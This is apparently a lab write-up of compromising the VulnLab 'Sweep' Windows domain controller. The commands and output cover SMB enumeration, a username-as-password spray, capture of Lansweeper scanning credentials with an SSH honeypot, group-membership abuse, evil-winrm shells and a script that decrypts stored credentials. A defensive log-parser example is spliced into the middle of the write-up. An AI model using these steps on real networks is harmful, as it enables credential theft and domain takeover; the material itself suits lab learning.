vulnlab sweep
a medium Windows machine
Tools used: crackmapexec, bloodhound-python, sshesame, evil-winrm
nmap scan
# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds
Enumerate
Guest share enumeration and RID brute force over SMB
┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest:
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share                Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----                -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                               Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                                   Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$                 READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                          Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                             Logon server share
SMB         10.10.80.128    445    INVENTORY        SYSVOL                               Logon server share
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)
Make a users file from the RID output and spray it with username=password:
cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success
Bloodhound Enum
┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip
Log in to the Lansweeper web console at http://sweep.vl:81/ as user intern. Go to Scanning -> Scanning credentials (note that saved credentials are in use), then Scanning -> Scanning targets -> add an IP range target covering your VulnLab VPN IP, and select the saved credentials for that target.
On the Kali machine, run an SSH honeypot. I used sshesame; the only thing that needs changing in sshesame.yaml is
listen_address: 10.8.2.138:22 (the VPN IP, in my case)
┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
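The log above is the whole point of the step: a discovery scanner will present its stored SSH credential to any host inside a target range, so whoever controls a host in that range receives the password. The parser below is an added example (not part of the original write-up or of sshesame) that reads sshesame's log format and summarises, per client connection, the client version string, the usernames tried, whether a password was submitted, and which commands the client requested. It records only the password length, never the cleartext, so the summary can be handed to the Lansweeper administrators as evidence that the credential is exposed and must be rotated. The sample log is constructed from the lines shown above with a placeholder in place of the password.

```python
import re
from dataclasses import dataclass, field

# sshesame peer lines: "<date> <time> [<ip>:<port>] <message>"
PEER_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<peer>[^\]]+)\] (?P<msg>.*)$"
)
AUTH_PW_RE = re.compile(r'authentication for user "(?P<user>[^"]*)" with password "(?P<pw>[^"]*)" accepted')
AUTH_NONE_RE = re.compile(r'authentication for user "(?P<user>[^"]*)" without credentials rejected')
CLIENT_RE = re.compile(r'connection with client version "(?P<ver>[^"]*)" established')
CMD_RE = re.compile(r'\[channel \d+\] command "(?P<cmd>[^"]*)" requested')

# Constructed sample based on the sshesame output shown above; the password is a placeholder.
SAMPLE_LOG = """\
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "<constructed-placeholder>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
""".splitlines()


@dataclass
class Session:
    peer: str
    first_seen: str
    client_version: str = ""
    users: list = field(default_factory=list)
    password_lengths: list = field(default_factory=list)  # lengths only; cleartext is never kept
    commands: list = field(default_factory=list)


def parse_sshesame_log(lines):
    """Group sshesame peer lines by "<ip>:<port>" and return {peer: Session}."""
    sessions = {}
    for line in lines:
        m = PEER_RE.match(line.strip())
        if not m:
            continue  # INFO/WARNING lines from the daemon itself carry no peer tag
        peer, msg = m["peer"], m["msg"]
        s = sessions.setdefault(peer, Session(peer=peer, first_seen=m["ts"]))
        if (a := AUTH_PW_RE.search(msg)):
            if a["user"] not in s.users:
                s.users.append(a["user"])
            s.password_lengths.append(len(a["pw"]))
        elif (a := AUTH_NONE_RE.search(msg)):
            if a["user"] not in s.users:
                s.users.append(a["user"])
        elif (c := CLIENT_RE.search(msg)):
            s.client_version = c["ver"]
        elif (c := CMD_RE.search(msg)):
            s.commands.append(c["cmd"])
    return sessions


def leaked_credentials(sessions):
    """(peer, client_version, users, number of passwords submitted) for every session
    in which a password reached the honeypot. Each such credential must be treated as exposed."""
    return [
        (s.peer, s.client_version, list(s.users), len(s.password_lengths))
        for s in sessions.values()
        if s.password_lengths
    ]


if __name__ == "__main__":
    for peer, version, users, n in leaked_credentials(parse_sshesame_log(SAMPLE_LOG)):
        print(f"{peer} ({version}) submitted {n} password(s) for {', '.join(users)}")
```

The client version string is the quickest way to tell a scanner from a human operator: the page's log shows RebexSSH, the library embedded in the scanning product, and that string never appears in an interactive OpenSSH login.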
Now log on to http://sweep.vl:81/Default.aspx as user svc_inventory_lnx
and continue from there with the higher privileges that account has,
or take the simpler way after adding svc_inventory_lnx to the "Lansweeper Admins" group.
Unintended way: https://github.com/Yeeb1/SharpLansweeperDecrypt
But first, as BloodHound suggests:
Full control of a group allows you to directly modify group membership of the group.
Use Samba's net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted for interactively if omitted from the command line:
┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:
Then WinRM to the box:
┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED>'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1

Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1

Data: 5700 bytes of 5700 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
  <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name="LsService Core .Net SqlClient Data Provider"" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>
Then WinRM to the box as admin:
┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>